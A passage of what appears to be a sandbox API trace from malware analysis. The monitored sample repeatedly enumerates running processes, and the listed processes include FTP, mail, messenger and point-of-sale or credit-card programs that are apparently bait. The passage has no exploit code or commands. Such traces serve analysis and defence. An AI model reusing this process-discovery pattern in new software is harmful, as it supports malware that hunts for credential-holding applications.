th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0257.342] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0257.344] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0257.346] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0257.348] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0257.351] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0257.354] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0257.356] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0257.359] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0257.361] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0257.363] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0257.365] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0257.368] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0257.370] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0257.390] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0257.398] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0257.400] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0257.412] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0257.415] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0257.417] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0257.420] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0257.423] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0257.425] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0257.427] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0257.429] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0257.431] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0257.433] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0257.442] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0257.444] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0257.446] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0257.448] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0257.849] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0257.854] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0257.856] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0257.858] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0257.860] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0257.862] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0257.864] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0257.866] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0257.867] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0257.869] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0257.875] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0257.878] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0257.879] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0257.881] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0257.883] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0257.884] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0257.886] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0257.891] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0257.897] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0257.902] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0257.904] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0257.906] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0257.908] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0257.909] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0257.911] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0257.912] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0257.914] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0257.917] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0257.922] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0257.924] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0257.926] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0257.928] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0257.929] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0257.930] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.932] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0257.934] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0258.030] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.032] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0258.034] CloseHandle (hObject=0x758) returned 1 [0258.034] Sleep (dwMilliseconds=0x64) [0258.154] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0258.166] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.171] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0258.173] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0258.174] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.176] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0258.177] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.179] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0258.181] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0258.182] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0258.184] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.189] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.190] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0258.192] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.193] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.195] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, 